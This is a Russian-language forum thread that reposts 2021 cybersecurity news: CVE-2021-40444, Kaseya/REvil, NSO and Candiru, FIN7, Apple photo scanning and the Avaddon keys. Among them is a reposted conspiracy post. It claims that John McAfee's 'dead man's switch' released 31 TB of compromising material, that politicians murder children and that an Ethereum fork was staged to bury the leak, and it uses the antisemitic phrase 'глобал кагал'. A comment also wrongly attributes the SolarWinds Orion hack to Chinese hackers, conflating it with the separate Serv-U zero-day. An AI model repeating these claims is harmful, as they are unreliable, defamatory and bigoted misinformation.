Уязвимость получила идентификатор CVE-2021-40444 и затрагивает Windows Server 2008-2019 и Windows 8.1-10 (8,8 баллов из 10 по шкале CVSS). Хотя MHTML в основном использовался для браузера Internet Explorer, этот компонент также применяется в приложениях Office для рендеринга размещенного в интернете контента внутри документов Word, Excel и PowerPoint.
«Microsoft известно о целевых атаках, которые пытаются эксплуатировать данную уязвимость с помощью специально созданных документов Microsoft Office», — предупреждают в компании.
Click to expand...
Как объясняют представители Microsoft, при помощи этого бага злоумышленник может создать вредоносный компонент ActiveX, который будет использоваться документом Microsoft Office и обрабатываться MHTML. Злоумышленнику придется лишь убедить пользователя открыть такой вредоносный файл, после чего атаку можно считать удавшейся.
Стоит отметить, что атака не сработает, если Microsoft Office работает с конфигурацией по умолчанию и документы открываются через Protected View или Application Guard для Office 365. Так, Protected View, это режим только для чтения, в котором большинство функций редактирования отключено, а Application Guard изолирует недоверенные документы, запрещая им доступ к корпоративным ресурсам, внутренней сети и другим файлам в системе. Таким образом, от уязвимости должны быть защищены системы с активным Microsof Defender Antivirus и Defender for Endpoint (версии 1.349.22.0 и новее).
0-day обнаружили исследователи из компаний Mandiant и EXPMON. Причем специалисты EXPMON, занимающиеся мониторингом эксплоитов, пишут в Twitter, что нашли уязвимость, когда разбирали «очень сложную 0-day атаку», направленную на пользователей Microsoft Office.
EXPMON system detected a highly sophisticated #ZERO-DAY ATTACK ITW targeting #Microsoft #Office users! At this moment, since there's no patch, we strongly recommend that Office users be extremely cautious about Office files - DO NOT OPEN if not fully trust the source!
— EXPMON (@EXPMON_) September 7, 2021Click to expand...
Специалист EXPMON Хайфей Ли (Haifei Li) рассказал журналистам Bleeping Computer, что злоумышленники использовали для атак файл .DOCX. При открытии этот документ загружал движок Internet Explorer для ренгеринга удаленной веб- страницы атакующего. Затем, с помощью элемента управления ActiveX, расположенного на этой странице, загружалась малварь. Это осуществлялось при помощи функции «Cpl File Execution», упомянутой в сообщении Microsoft.
Исследователь подчеркнул, что такой метод атак на 100% надежен, что делает его очень опасным.
__https://twitter.com/x/status/1435309115883020296
Так как настоящее время патчей пока нет, Microsoft предложила следующее решение проблемы: отключение установки всех компонентов ActiveX в Internet Explorer. Подробные инструкции можно найти в сообщении Microsoft.
Источник: https://xakep.ru/2021/09/08/mhtml-0day/
P.S статья не моя копирнул !
!
"Закончить пост хотелось бы, Друзья, новостью о нашем коллеге и соратнике,
ушедшем из Мира по воле глобал кагал, Джоне Макафи. Дело в том, что Джон как-
то обмолвился, что у него есть тьма компромата, ключи от которого хранятся в
надежном месте, и который будет опубликован в случае его смерти. Страховой
случай, как мы все понимаем, наступил", - писал я не так давно в одном из
своих постов, "Итак, буквально на днях, в телеге появился телеграмм-канал
McAfee, где публикуется множество старых фотографий Джона и некоторые
документы, которые могут быть только у него или у кого-то из его близких. Если
Джон не преувеличивал на всех, говоря о компромате, и если у него все
получилось, то очень скоро мы можем стать свидетелями инфоразворота
относительно deepstate и веселого скандала с BigPharma, BigTech и многая
прочая. Это будет довольно эпический поворот в истории о McAfee.".
В связи с этим, Друзья, спешу сообщить, что, как поделился вчера один из Коллег, компромат, обещанный Джоном, с большой задержкой, но всё же пришел в движение. Информация и коды доступа к 31Tb информации опубликованы на Телеграм канале Макафи с говорящим названием “Загробная жизнь Макафи” с описанием канала: “Отец, Спящий Проснулся”
Сегодня там появился пост следующего содержания:
_" Все средства запущены:
Я собрал файлы о коррупции в правительствах, политиках, фальшивых новостях, “знаменитостях” и многом другом... Впервые я называю Имена и Подробности:
Я разблокировал хранилище до самого смертоносного коммутатора, который вы можете себе представить, 31+ терабайт самых компрометирующих данных будут обнародованы по всему миру...
Все ключи представлены на моем канале: Теперь всё зависит от вас, захотите ли вы искать истину.
С меня хватит! Заговора больше Нет. Они не смогут теперь запросто пройти по улице. Ты слышишь? Это затишье перед бурей: Имейте веру в человечество!Имейте веру в себя. Еикогда не сдавайся! Кто победит в конце концов победит...?"_
В то же время 30% токенов Макафи WHACKD сгорели в смартконтракте монеты и открылся доступ к пяти папкам:
KONO, LITTLE ST JAMES, Mother LODE, NAKAMOTO, SETI SERENDIP.
Ключи к ним опытные пользователи найдут на Телеграм канале Джона. Все ссылки в моем телеграм-канале Стёб(ссылка в конце поста).
На самом Телеграм канале Макафи появились ужасные фотографии, изобличающие известных политиков в педофилии и убийствах детей, слабонервным которые смотреть не рекомендуется.
Появление в списке папок одной с загадочным названием NAKAMOTO вполне может проливать свет на происхождение биткоина. Когда папка будет раскрыта, цена главной криптовалюты может отреагировать очень неожиданно. ОЧЕНЬ-ПРЕОЧЕНЬ, Друзья.
Есть слухи, что недавняя возможная атака на Ethereum и раздвоение сети Эфира могла быть связана с нежеланием правительства США допустить публикацию самого грязного компромата в истории.
Таким образом команда Ethereum пыталась убить ветку, в которой состоялась публикация ссылок на файлы с компроматом Макафи.
Если существуют люди, у которых есть навыки пользования командной строкой, PGP ключами и паролями для зашифрованных архивов, и такие люди не боятся за свои жизни, то скоро мы можем увидеть где-нибудь в сети раскрытые архивы и расшифрованные папки с компроматом.
То есть, Друзья, как видим, старина Джон, с которым глобал кагал расправилось также ,как они расправляются со всеми, не обманул. Информация, которую он только-только начал публиковать, действительно ужасна, Друзья.
Паб ключ с телеги
-----BEGIN PGP PUBLIC KEY BLOCK-----
xjMEYSVIzxYJKwYBBAHaRw8BAQdA3p7s7oz8X2OwHATFKWShQjLexcaBWyGM
mHq5ok1npy3NNW9yaWdpbmFsMTdAcHJvdG9ubWFpbC5jb20gPG9yaWdpbmFs
MTdAcHJvdG9ubWFpbC5jb20+wo8EEBYKACAFAmElSM8GCwkHCAMCBBUICgIE
FgIBAAIZAQIbAwIeAQAhCRDrGND1ys+qQxYhBE0TIiXzefF0KP6ddesY0PXK
z6pDMqcBAJnyeAkqLkVtE2xer2x9Wg48rQntO9HdrYFuFy9MCpeZAQCHBYEX
hWJR0K9PkatNV+4m+ZZ/2Zyw7jsQdL8Ze84xAc44BGElSM8SCisGAQQBl1UB
BQEBB0BZd4GGFk1whTWyY60+CyvHQITb43Rw3nfDdmgVJaC+DgMBCAfCeAQY
FggACQUCYSVIzwIbDAAhCRDrGND1ys+qQxYhBE0TIiXzefF0KP6ddesY0PXK
z6pDUyEA/RPdRQaylsyL81JCB0ZdPnwuhSVmtEHQK3e/OAwQuZDzAQDqanbp
ii6GYCEodsnjiLP6x0+mCupghml+3kXOX4HmDA==
=efCK
-----END PGP PUBLIC KEY BLOCK-----
Сама телега: t.me/McafeeAfterlife - слабонервным не смотреть
В смартфонах компании Apple в скором будущем появится функция сканирования фотографий на предмет наличия среди них незаконных снимков, пишет профильный портал 9to5Mac. Эту информацию подтверждает в своем Twitter и эксперт по информационной безопасности (ИБ) и по совместительству доцент Института ИБ Джона Хопкинса Мэтью Грин (Matthew Green).
Apple разрабатывает систему сканирования снимков, которая будет искать в iCloud фотографии с любой эксплуатацией несовершеннолетних, включая насилие над детьми или детскую порнографию. Спрашивать у владельцев гаджетов разрешение на подобную слежку компания не собирается.
Особенности технологии
Apple опубликовала на своем сайте информацию о принципе работы нового сканера. Она утверждает, что поиск «запрещенки» в фотографиях пользователей будет основан на сопоставлении хэш-сумм изображений с базами данных известных изображений сексуального насилия над детьми. Доступ к этим базам Apple предоставил целый ряд профильных организаций, включая Национальный центр по делам пропавших без вести и эксплуатируемых детей США (NCMEC).
Система Apple будет иметь некое пороговое значение «опасных» снимков, после превышения которого компания получит информацию об этом. Она уверяет, что система работает безупречно, заявляя, что вероятность ошибочной интерпретации снимка составляет один случай на триллион.
После превышения этого неназванного порогового значения специалисты Apple будут вручную проверять каждый отчет по каждой фотографии. Если на снимках действительно будет обнаружена «запрещенка», они заблокируют профиль пользователя и передадут все полученные данные в NCMEC.
У пользователя будет возможность оспорить решение о блокировке, если, по его мнению, она была ошибочной. Как будет организован процесс оспаривания, остается неизвестным.
О снимках смогут узнать все
Пока нет данных о том, как именно новые алгоритмы Apple будут определять возраст людей на фотографиях. Например, нет представления о том, как Apple сможет отличить фотографии 18-летней девушки, считающейся взрослой и совершеннолетней и решившей запечатлеть себя в неглиже вместе со своим бойфрендом, выглядящим старше своего возраста, от 17-летней.
По данным 9to5Mac, система проверки фотографий будет работать локально, то есть непосредственно на устройстве пользователя, без предварительной загрузки файлов на удаленный сервер. Однако абсолютно снимок, который покажется ей подозрительным, будет незамедлительно отправлен на проверку третьим лицам.
На основании этого можно предположить, что упомянутая выше 18-летняя девушка, решившая запечатлеть себя в нижнем белье (или без него) на камеру своего iPhone, рискует без своего желания «поделиться» таким селфи с неизвестным ей человеком. Также есть риск, что этот неизвестный человек организует (умышленно или случайно) появление таких кадров в свободном доступе в интернете.
Риск нарушения приватности огромен
После появления информации о новых попытках Apple влезть в частную жизнь владельцев своих гаджетов эксперты по кибербезопасности забили тревогу. В числе первых высказался и упомянутый Мэтью Грин.
«Такой инструмент может оказаться благом для поиска детской порнографии в мобильниках людей. Но вообразите, во что он может превратиться в руках авторитарного правительства?», – написал Грин в своем Twitter, назвав затею Apple плохой.
«Это абсолютно отвратительная идея, поскольку она приведет к децентрализованной массовой слежке за нашими телефонами и ноутбуками», – заявил изданию Financial Times профессор техники обеспечения безопасности в Кембриджском университете Росс Андерсон (Ross Anderson). С ним полностью согласен и аналитик в области информационной безопасности Алек Маффетт (Alec Muffett). «Apple отступает от приватности, чтобы сделать возможным “1984” год», – сказал он, имея в виду известнейшее произведение Дж. Оруэлла «1984» в жанре антиутопии. Маффет назвал решение Apple «тектоническим сдвигом» и «огромным и регрессивным шагом к личной конфиденциальности». К слову, Маффет ранее работал в компании Facebook, известной регулярными утечками данных десятков миллионов пользователей.
Слежка за сообщениями
Несмотря на все риски приватности, озвученные экспертами, Apple пока не собирается отказываться от задуманного. Более того, она не станет ограничиваться слежкой за одним лишь фотографиями.
Apple также возьмет под свой контроль и переписку пользователя. Новые алгоритмы будут настроены на поиск откровенных снимков, отправленных и полученных через приложение «Сообщения».
Если на телефон ребенка придет сообщение с ню-фотографией, новая система Apple без промедлений «смажет» его, чтобы ничего нельзя было разглядеть. Попутно компания уведомит родителей ребенка о поступлении на его мобильник такого «контента».
Как избежать контроля
Систему слежки Apple внедрит в iOS 15, пишет Financial Times. Пока неизвестно, смогут ли пользователи самостоятельно отключить ее.
На момент публикации материала единственным способом оставить любопытство Apple неудовлетворенным являлся полный отказ от хранения снимков в памяти своих гаджетов и в iCloud. Также можно отказаться от использования приложения «Сообщения» и перейти в мессенджеры сторонних разработчиков.
После серии разрушительных атак на топливного гиганта Colonial Pipeline и крупнейшего в мире поставщика мяса JBS с использованием программ-вымогателей на киберпреступных форумах были запрещены публикации, связанные с вымогательским ПО. Но группировки нашли способы обойти данный запрет, сообщило издание The Daily Beast.
Киберпреступники проявили изобретательность перед лицом новых запретов и теперь планируют свои атаки так, чтобы избежать подозрений со стороны правоохранительных органов.
Один из пользователей форумов XSS и Exploit размещал сообщения, предлагая «помощь» другим пользователям, которые взломали компьютерные сети компании и имели различные возможности доступа. Пользователь «хотел помочь другим людям с доступом к уязвимым виртуальным частным сетям (VPN), но которые не знали, что с ним делать».
Другой пользователь на форуме XSS рекламировал якобы «команду опытных пентестеров», которые хотят купить доступ к уязвимым корпоративным сетям. Такое поведение типично для намерения сотрудничества с программами- вымогателями.
По словам экспертов, желающие заключить партнерство с операторами вымогателей, начинают ставить «лайки» чужим сообщениям на криминальных форумах с целью привлечь внимание киберпреступников и связаться с ними по частным каналам.
securitylab.ru/news/523605.php
пикча взята с источника.
Тут The Guardian выпустил очень интересное расследование связанное с NSO Group
которые скупают 0-day.
В крации NSO Group продавали софт авторитарным правителям, так те могли
следить за полит непригодными. Мало того слежка велась за высокопоставленными
чиновниками и журналистами.
источник: [https://www.theguardian.com/world/2...f-cyber-surveillance-weapon- nso-group-pegasus](https://www.theguardian.com/world/2021/jul/18/revealed- leak-uncovers-global-abuse-of-cyber-surveillance-weapon-nso-group-pegasus)
Представители компании Kaseya, чьи клиенты недавно пострадали от атак шифровальщика REvil, [сообщили](https://www.kaseya.com/potential-attack-on- kaseya-vsa/), что в распоряжении компании появился универсальный инструмент для дешифрования данных. Эффективность инструмента уже подтвердили специалисты ИБ-компании Emsisoft. Напомню, что в начале июля клиенты поставщика MSP- решений Kaseya пострадали от масштабной атаки шифровальщика REvil (Sodinokibi). Тогда хакеры использовали 0-day уязвимости в продукте компании (VSA) и через них атаковали клиентов Kaseya. В настоящее время для этих уязвимостей уже выпущены патчи.
Основная проблема заключалась в том, что большинство пострадавших серверов VSA использовались MSP-провайдерами, то есть компаниями, которые управляют инфраструктурой других клиентов. А значит, злоумышленники развернули шифровальщика в тысячах корпоративных сетей. По официальным данным, компрометация затронула около 60 клиентов Kaseya, через инфраструктуру которых хакеры смогли зашифровать примерно 800-1500 корпоративных сетей.
После этой атаки операторы REvil потребовали выкуп в размере 70 миллионов долларов США, и тогда пообещали опубликовать универсальный дешифратор, который может разблокировать все компьютеры. Вскоре группировка «снизила планку» до 50 миллионов долларов.
Однако в итоге хакерская группа полностью «исчезла с радаров», а сайты и вся инфраструктура вымогателя REvil в целом ушли в оффлайн без объяснения причин. Речь идет о целой сети обычных и даркнет-сайтов, которые используются для переговоров о выкупе, слива похищенных у жертв данных и внутренней инфраструктуры вымогателя. С 13 июля 2021 года все они по какой-то причине не работают. В результате многие компании остались без возможности восстановить свои данные, даже если они были готовы заплатить хакерам выкуп.
Пока в Kaseya отказываются сообщать, откуда взялся этот инструмент для расшифровки данных, но в компании заверили, что он универсален и подойдет для всех пострадавших MSP и их клиентов.
В Лос-Анджелесе арестован 27-летний гражданин России Егор Крючков, подозреваемый в попытке подкупа с целью совершения киберпреступления. Об этом сообщается на сайте министерства юстиции США.
По данным ведомства, Крючков прибыл в США по туристической визе и примерно с 15 июля по 22 августа пытался вступить в сговор с сотрудником неназванной американской компании в Неваде. Россиянин предлагал ему взятку в один миллион долларов за то, чтобы он установил вредоносное программное обеспечение на свой рабочий компьютер. Таким образом Крючков планировал получить доступ к системе компании и потребовать у нее выкуп за то, чтобы не обнародовать информацию.
В сообщении Минюста сказано, что сотрудник неоднократно встречался с Крючковым. Когда с ним связались представители ФБР, Крючков выехал из города Рино в штате Невада в Лос-Анджелес и попросил знакомого купить ему авиабилет, чтобы покинуть страну. 22 августа Крючкова задержали, обвинив "в сговоре по найму сотрудника компании для внедрения вредоносного программного обеспечения в компьютерную сеть, получения данных компании и последующего вымогательства денег".
В посольстве России в Вашингтоне сообщили, что дипломаты в курсе ареста россиянина. Они намерены связаться с ним и оказать ему необходимую помощь, пишет РИА "Новости".
• Source: justice[.]gov/opa/press-release/file/1308766/download
• Source: justice[.]gov/opa/pr/russian-national-arrested-conspiracy-introduce- malware-nevada-companys-computer-network
В США 17 (!!!) разведывательных служб и ведомств, плюс государственные и корпоративные службы кибербезопасности и вся эта х..ва туча “специалистов” не может определить из какой страны идут атаки.
Компания Microsoft сообщила, что массированная кибератака SolarWinds была организована группой хакеров из Китая.
Группа Microsoft Threat Intelligence Center (MSTIC) обнаружила эксплойт удаленного выполнения кода нулевого дня, который использовался для атаки на программное обеспечение SolarWinds Serv-U FTP в ограниченных и целевых атаках.
Как сообщила компания в обновленной информации в среду: «Основываясь на наблюдаемой виктимологии, тактике и процедурах, MSTIC с высокой степенью уверенности приписывает эту кампанию DEV-0322, группе действующей из Китая», -.
Для проведения атаки хакеры установили вредоносное ПО в программное обеспечение Orion, продаваемое управляющей ИТ-компанией SolarWinds. В сообщениях говорилось, что хакеры взломали как минимум 250 федеральных агентств и ведущих предприятий США.
Атака нулевого дня была впервые обнаружена при обычном сканировании Microsoft 365 Defender.
«Используемая уязвимость - это CVE-2021-35211, которая была недавно исправлена SolarWinds. Мы настоятельно призываем всех клиентов обновить свои экземпляры Serv-U до последней доступной версии», - сообщила Microsoft.
По данным Microsoft, хакеры взломали программное обеспечение SolarWinds, что позволило им «выдать себя за любого из существующих пользователей и учетных записей организации, включая учетные записи с высокими привилегиями».
Компания заявила, что обнаружила, что в ее системы проникли «не только из-за наличия вредоносного кода SolarWinds».
Правительству США может потребоваться несколько месяцев, чтобы завершить расследование взлома SolarWinds.
Обеспокоенный неоднократными кибератаками на страну, особенно после того, как на ключевом топливопроводе, президент США Джо Байден подписал распоряжение о внедрении новой политики по повышению национальной кибербезопасности.
Другими словами - США взламывают китайские хакеры, а инструменты для взлома им продают лучшие друзья американцев израильтяне. А Америка выкатывает бочку на Россию. Вот интересно они это делают специально или они реально идиоты.
На фоне растущих опасений, что в бизнес по разработке и продаже инструментов для взлома широко используемого программного обеспечения глубоко вовлечены израильтяне, американская корпорация Microsoft и правозащитная группа Citizen Lab заявляют, что израильская группа продала хакерам инструмент для взлома Microsoft Windows.
В отчете Citizen Lab говорится, что поставщик хакерских инструментов по имени Candiru создал и продал программный эксплойт, способный проникать в Windows, это был один из нескольких шпионских продуктов, продаваемых растущей секретной отраслью Израиля.
Reuters сообщает - исследователи в области безопасности предоставили подробную информацию о том, как хакерский инструмент Candiru распространился по всему миру среди большого числа неназванных клиентов, где он, как показывают отчеты Citizen Lab и Microsoft, затем использовался для атак на различные организации гражданского общества.
Согласно отчету Citizen Lab, данные свидетельствуют о том, что эксплойт применялся против пользователей во многих странах, включая Иран, Ливан, Испанию и Великобританию.
«Растущее присутствие Candiru и использование его технологий наблюдения против глобального гражданского общества является мощным напоминанием о том, что индустрия шпионского ПО включает в себя множество игроков и подвержена широко распространенным злоупотреблениям», - говорится в отчете Citizen Lab.
Microsoft не назвала Candiru напрямую, а описала ее как «агрессивную израильскую частную компанию» под кодовым названием Sourgum.
«Sourgum обычно продает кибероружие, которое позволяет её клиентам, часто государственным учреждениям по всему миру, взламывать подключенные к Интернету компьютеры, телефоны, сетевую инфраструктуру и устройства, для своих своих целей», - написала Microsoft в блоге.
«Эти агентства затем выбирают, кого атаковать, и сами проводят фактические операции», - говорится в сообщении.
Сообщается, что инструменты Candiru также использовались для выявления и взлома слабых мест в других распространенных программных продуктах, таких как браузер Google Chrome.
_А причем тут Россия во всей этой истории, спросите вы.
Действительно, а причем тут Россия?_
• Source: <https://thehackernews.com/2021/04/us-sanctions-russia-and- expels-10.html>
США и Великобритания в четверг официально приписали атаку на цепочку поставок компании SolarWinds, управляющей ИТ-инфраструктурой, с "высокой степенью уверенности" в адрес государственных служащих, работающих на Службу внешней разведки России (СВР).
«Модель злонамеренного поведения России во всем мире - будь то в киберпространстве, вмешательстве в выборы или агрессивных операциях их разведывательных служб - демонстрирует, что Россия остается самой серьезной угрозой национальной и коллективной безопасности Великобритании», - заявило правительство Великобритании в своем заявлении.
С этой целью Министерство финансов США ввело масштабные санкции против России за «подрыв проведения свободных и справедливых выборов и демократических институтов» в США и за ее роль в содействии разрастающемуся хакерскому взлому SolarWinds, а также запретило шесть технологических компаний в стране, которая поддерживает киберпрограмму, проводимую российскими спецслужбами.
Атака на Kaseya VSA цепочку поставок затронула более 200 компаний. VSA был заражен Revil вымогателем
Source: https://www.bleepingcomputer[.]com/...its-200-companies-in-msp-supply- chain-attack/
Журналисты Reuters сообщили, что им удалось связаться с хакерами, взломавшими программу компании Kaseya, и узнать об их готовности "договариваться".
Хакерская группировка REvil, которая, судя по всему, стоит за масштабной кибератакой, затронувшей более тысячи фирм по всему миру, объявила о готовности обсудить сумму выкупа за разблокировку поврежденных компьютерных систем. Как пишет информагентство Reuters во вторник, 6 июля, сотруднику IT- компании Krebs Stamos Group удалось выйти на связь со злоумышленниками и пообщаться с ними на эту тему.
Уточняется, что хакеры назвали сумму в 50 млн долларов. Ранее за восстановление работы поврежденных ими компьютерных систем они требовали на 20 млн долларов больше. Агентство Reuters заявляет, что его сотрудникам также удалось списаться с хакерами и услышать от них фразу: "Мы всегда готовы договариваться".
На данный момент эксперты по компьютерной безопасности склонны полагать, что хакеры переоценили свои силы, зашифровав огромный массив данных. "Несмотря на громкие заявления в их блоге, я думаю, что ситуация вышла у них из-под контроля", - считает Аллан Лиска - представитель занимающейся кибербезопасностью компании Recorded Future.
Комментарий компании Kaseya по поводу взлома ее программы
6 июля председатель совета директоров компании Kaseya Фред Воккола отметил, что оценить масштаб причиненного хакерами ущерба пока трудно, поскольку затронуты были преимущественно клиенты его фирмы. "Мы не думаем, что хакерам удалось внедриться в нашу сеть", - сказал Воккола, добавив, что Kaseya обнародует все подробности, касающиеся кибератаки, как только это будет безопасно.
Сейчас эксперты компании работают над устранением слабого места, которое нашли хакеры. Комментировать информацию о том, что злоумышленники готовы к переговорам по сумме выкупа, Воккола отказался.
Вредоносный апдейт
В результате одной из крупнейших кибератак, совершенных с целью вымогательства, со второй половины дня 2 июля во всем мире оказалась заблокирована работа тысяч различных компаний. Группировка REvil взломала инструмент программного интерфейса VSA компании Kaseya и установила вредоносный апдейт, в результате которого пострадали тысячи клиентов этой американской фирмы: хакеры путем шифрования данных заблокировали целые системы бухгалтерского учета.
Одной из самых крупных компаний, пострадавших от действий хакеров из группировки REvil, является шведская сеть супермаркетов Coop. Из-за нарушения работы ее кассовых систем она оказалась вынуждена временно закрыть все 800 филиалов.
5 июля Федеральное ведомство по безопасности в сфере информационной техники (BSI) подтвердило, что в связи с кибератакой к ним обратились уже две компании из Германии.
Национальные киберсилы
Редакция CNews ознакомилась с отчетом Международного института стратегических исследований (International Institute for Strategic Studies IISS), аналитики которого сделали попытку оценить потенциал кибервозможностей 15 стран мира по итогам двухлетнего исследования с применением современных подходов и методов анализа данных. Согласно выводам документа, Россия наряду с Австралией, Канадой, Китаем, Францией, Израилем и Великобританией вошла во «вторую группу» ведущих кибердержав мира, которые имеют ряд преимуществ в некоторых оценочных категориях.
Единственным представителем «первой группы» стран с преобладающими возможностями во всех категориях стали США, они же возглавили рейтинг кибердержав IISS. В третью группу стран с отдельными преимуществами, потенциалом для их развития и одновременно недостатками вошли Индия, Индонезия, Иран, Япония, Малайзия, Северная Корея и Вьетнам.
Великобритания, Канада, Австралия, Франция, Япония и Израиль характеризуются в документе как союзники и ближайшие партнеры США в киберпространсте; Китай, Россия, Иран и Северная Корея – как основные государства, «представляющие киберугрозу интересам Запада»; Индия, Индонезия, Малайзия и Вьетнам названы странами на ранних этапах развития своих киберсил.
Для оценки киберпотенциала государств аналитики IISS использовали такие категории как стратегия и доктрина; управление, командование и контроль; основные возможности киберразведки; расширение возможностей киберпространства; кибербезопасность и киберустойчивость; глобальное лидерство в киберпространстве; наступательные кибервозможности.
Как отмечается в документе, исследование призвано помочь ответственным лицам сфокусироваться на кибервозможностях, которые имеют ключевое значение для государственной власти, а также правительствам и корпорациям в расчетах стратегических рисков и инвестиций.
Российская кибердержава
Киберстратегии России в докладе IISS посвящено девять страниц. Структура российской кибербезопасности описывается в документе как централизованная и иерархичная, находящаяся «под личным контролем президента». Стратегию российских властей документ описывает как «продиктованную противостоянием с Западом», где кибероперации выглядят как важный компонент в рамках более широкой информационной войны».
Россия характеризуется как страна, сильно зависящая от иностранных ИКТ- корпораций, но, тем не менее, с не менее впечатляющей цифровой экономикой, чем, например, у Великобритании или Франции. Российские власти стремится исправить ключевые слабые места в своей кибернетической безопасности за счет госрегулирования, создания суверенного интернета и поощрения развития местной цифровой индустрии, отмечается в документе.
В документе отмечаются успехи России в последние два десятилетия по сокращению разрыва с западными странами в технологических преимуществах в киберпространстве, особенно с США. Российские наступательные кибервозможности характеризуются как «надежные». Отмечается успешное их использование для вмешательства в политические процессы потенциальных противников, включая США, а также успешные операции российской киберразведки, некоторые из которых позволяют оценить возрастающий уровень ее технической сложности.
Среди минусов российской киберстратегии отмечается отсутствие достаточного внимания развитию инструментов для совершения «хирургических» киберпреступлений, которые, по мнению авторов доклада, необходимы «для ведения войны высокой интенсивности».
В целом Россия характеризуется как кибердержава второго уровня, которой для достижения уровня США потребуется существенное улучшение кибербезопасности, увеличение доли на мировом рынке цифровых технологий и дальнейший прогресс в разработке сложных наступательных военных кибернетических инструментов.
Противостояние в киберпространстве
Авторы исследования отмечают отставание Китая и России с точки зрения кибербезопасности от стран разведывательного альянса Five Eyes (Австралия, Канада, Новая Зеландия, Великобритания и США – прим. CNews), а также от Израиля и Франции. В качестве аргументов приводятся доказательства из внутренних отчетов стран, позиции в глобальном индексе кибербезопасности Международного союза электросвязи (ITU Global Cybersecurity Index), а также усиление госконтроля России и Китая над суверенным киберпространством и частичное стремление к технической изоляции от глобального интернета.
По развитию наступательных киберсил, наличию соответствующего опыта, уровню кибершпионажа, определенности политического курса и доктринального мышления Китай и Россия характеризуются в отчете как превосходящие все другие государства кроме США, а по внедрению киберметодов для массового влияния и подрывной деятельности против противников – как не имеющие равных.
По мнению аналитиков IISS, Китай является единственным государством, которое потенциально способно занять место в первой категории кибергосударств рядом с США. Несмотря на возможность замедления этого процесса из-за принимаемых с 2019 г. мер США по ограничению доступа китайских компаний к своему рынку и рынкам союзников, Китай обладает двумя преимуществами.
Во-первых, там живет более 1 млрд из 4,5 млрд интернет-пользователей интернета в мире (больше, чем в США и Европе вместе взятых). Во-вторых, привлекательность китайских технологий для развивающихся стран за счет их дешевизны.
Перспективы мирового баланса киберсил
По мнению авторов доклада, лидерство США в киберпространстве – в том числе, благодаря союзническим отношениям, сохранится как минимум на ближайшее десятилетие. Во-первых, за счет передовых кибертехнологий и их использовании в экономике и обороне, где США по-прежнему опережают Китай, во-вторых, за счет ограничений доступа Китая к ряду западных технологий, которые США и их ведущие союзники вводят с 2018 г.
Все это потенциально может помешать Китаю в разработке собственных передовых технологий. От того, насколько «решительно США продолжат эту стратегию и как отреагирует Китай, будет зависеть будущий баланс киберсилы», считают авторы доклада.
Гражданин Украины Андрей Колпаков, обвиняемый в участии в похищении данных 15 млн банковских карт, будет экстрадирован в США.
По данным Министерства юстиции США, Колпаков является одним из руководителей киберпреступной группировки FIN7, занимающейся похищением банковских данных. Украинец был арестован в прошлом году в Испании по запросу американских властей. В 2018 году были арестованы еще два человека, вместе с Колпаковым составлявших «верхушку» FIN7. Власти США выдвинули против них обвинения по 26 пунктам, в том числе в краже личности с отягчающими обстоятельствами, умышленном нанесении ущерба защищенным компьютерам и мошенничестве с использованием средств связи.
Согласно обвинительному акту, в FIN7 Колпаков был пентестером наивысшего уровня и руководил другими взломщиками, в чьи обязанности входила компрометация компьютеров без ведома жертв.
По словам адвоката Вадима Глозмана, представ перед судом в Вашингтоне, его подзащитный намерен отрицать вину. «Я готовлю его к скорой экстрадиции. Я ненадолго связывался с ним и его семьей… Но очень сложно общаться, когда он находится в испанской тюрьме», - сообщил Глозман изданию CyberScoop.
ps: 2018
Министерство юстиции США выдвинуло обвинения трем гражданам Украины, являющимся членами печально известной хакерской группировки Carbanak (также известной как Cobalt и FIN7).
По словам представителей министерства, преступники похитили порядка 15 млн номеров платежных карт из более чем 6 тыс. PoS-терминалов. Для получения прибыли злоумышленники продавали данные платежных карт в даркнете.
Обвинения предъявлены в отношении преступлений, совершенных против компаний из США, однако группировка также ответственна за взлом фирм в Великобритании, Австралии и Франции.
44-летний Дмитрий Федоров, известный под псевдонимом hotdima; Федор Хладыр, 33 года, действовавший под псевдонимами das и AronaXus; и Андрей Копаков, 30 лет, известный как santisimo, являются гражданами Украины.
По данным министерства, Федоров является «профессиональным хакером и менеджером, который контролировал действия других членов группировки, взламывавших компьютерные системы жертв».
Федоров был арестован в январе 2018 года в Польше, где он остается под стражей в ожидании экстрадиции. Хладыр, второй подозреваемый, был также арестован в январе 2018 года в Дрездене, Германия, и был экстрадирован в США, где он ожидает суда в Сиэтле.
Согласно информации министерства, Хладыр был «системным администратором FIN7, который, среди прочего, поддерживал серверы и каналы связи, используемые группировкой, а также занимал управленческую роль, делегируя задачи и предоставляя инструкции другим членам».
Третий обвиняемый хакер, Андрей Копаков, был арестован в марте 2018 года в Испании. Европол объявил об аресте Копакова, назвав его лидером FIN7, однако министерство опровергло данную информацию.
Ранее исследователи безопасности из компании Group-IB сообщили подробности о дальнейшей деятельности группировки. Несмотря на арест Копакова, оставшиеся члены продолжают свою деятельность. В частности, 23 и 28 мая 2018 года Carbanak снова провела серию атак на банки в России, странах СНГ и зарубежные финансовые организации.
• Source: justice[.]gov/opa/pr/three-members-notorious-international- cybercrime-group-fin7-custody-role-attacking-over-100
• Source: justice[.]gov/opa/press-release/file/1084306/download
• Source: justice[.]gov/opa/press-release/file/1084311/download
• Source: justice[.]gov/opa/press-release/file/1084316/download
Основатель компании McAfee Джон Макафи покончил с собой в тюрьме в Испании, пишет газета País со ссылкой на источники в полиции.
Ранее стало известно, что Национальный суд Испании одобрил экстрадицию бизнесмена в США, где его обвиняют в неуплате налогов. Выступая на слушаниях, 75-летний Макафи заявил, что если его выдадут Штаты, то он "почти точно проведет конец жизни в тюрьме".
По данным País, основатель McAfee совершил самоубийство в тюрьме в муниципалитете Сант-Эстеве-Сесровирес (провинция Барселона, автономное сообщество Каталония). Тело Макафи обнаружили в его камере. Медики пытались провести реанимацию, но не смогли его спасти.
Del
Операторы шифровальщика Avaddon прекратили работу и предоставили изданию Bleeping Computer ключи для расшифровки данных жертв.
Утром 11 июня 2021 года журналисты получил анонимную наводку (якобы от ФБР) на защищенный паролем файл ZIP (Decryption Keys Ransomware Avaddon), а также пароль от него. Архив содержал три файла, показанные на скриншоте ниже.
Показав полученные файлы экспертам, Фабиану Восару из Emsisoft и Майклу Гиллеспи из Coveware, журналисты установили, что полученные ими ключи дешифрования являются легитимными.
В общей сложности злоумышленники прислали изданию 2934 ключа для дешифрования данных, каждый из которых соответствует определенной жертве. Эксперты Emsisoft уже работают над созданием бесплатного инструмента для расшифровки данных, который обещают выпустить в течение следующих 24 часов или даже раньше.
